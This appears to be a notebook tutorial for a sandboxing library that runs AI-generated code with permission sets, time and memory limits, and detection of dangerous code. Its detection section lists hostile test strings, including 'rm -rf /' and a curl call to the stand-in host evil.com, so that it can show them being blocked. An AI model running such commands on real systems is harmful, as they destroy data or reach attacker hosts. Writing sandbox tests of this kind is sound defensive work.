# Agent Sandbox Tutorial

Learn to securely execute AI-generated code with proper sandboxing.

## Why Sandboxing?

AI agents often need to execute code, but we need to:
- Prevent dangerous operations (file deletion, network access)
- Limit resource usage (memory, CPU time)
- Audit all operations
- Control permissions granularly

In [ ]:
from agent_sandbox import Sandbox, SandboxConfig, Permission, PermissionSet

print("Sandbox library loaded!")

## 1. Basic Execution

In [ ]:
sandbox = Sandbox()

result = sandbox.execute("""
numbers = [1, 2, 3, 4, 5]
total = sum(numbers)
print(f"Sum: {total}")
""")

print(f"Success: {result.success}")
print(f"Output: {result.output}")

## 2. Permission Control

In [ ]:
# Configure restrictive permissions
permissions = PermissionSet([
    Permission.FILE_READ,  # Can read files
    # No FILE_WRITE, NETWORK, or SUBPROCESS
])

config = SandboxConfig(permissions=permissions)
sandbox = Sandbox(config)

# This will be blocked
result = sandbox.execute("""
import socket
socket.create_connection(('google.com', 80))
""")

print(f"Network blocked: {not result.success}")
print(f"Error: {result.error}")

## 3. Resource Limits

In [ ]:
config = SandboxConfig(
    timeout=2,         # 2 second timeout
    max_memory_mb=50,  # 50MB memory limit
)
sandbox = Sandbox(config)

# This will timeout
result = sandbox.execute("""
import time
time.sleep(10)  # Will be killed after 2 seconds
""")

print(f"Timed out: {result.timed_out}")
print(f"Execution time: {result.execution_time:.2f}s")

## 4. Dangerous Code Detection

In [ ]:
dangerous_patterns = [
    "os.system('rm -rf /')",
    "eval(input())",
    "exec(untrusted_code)",
    "import subprocess; subprocess.call(['curl', 'evil.com'])",
]

sandbox = Sandbox()

for code in dangerous_patterns:
    result = sandbox.execute(code)
    print(f"'{code[:40]}...' - Blocked: {not result.success}")

## 5. Capturing Variables

In [ ]:
result = sandbox.execute("""
def calculate_stats(numbers):
    return {
        'sum': sum(numbers),
        'mean': sum(numbers) / len(numbers),
        'min': min(numbers),
        'max': max(numbers),
    }

data = [1, 2, 3, 4, 5, 10, 20]
stats = calculate_stats(data)
""", capture_locals=True)

print(f"Captured stats: {result.locals.get('stats')}")

## Conclusion

The Agent Sandbox provides:
- Fine-grained permission control
- Resource limiting (time, memory)
- Dangerous pattern detection
- Variable capture
- Comprehensive audit logging

Use it to safely execute AI-generated code!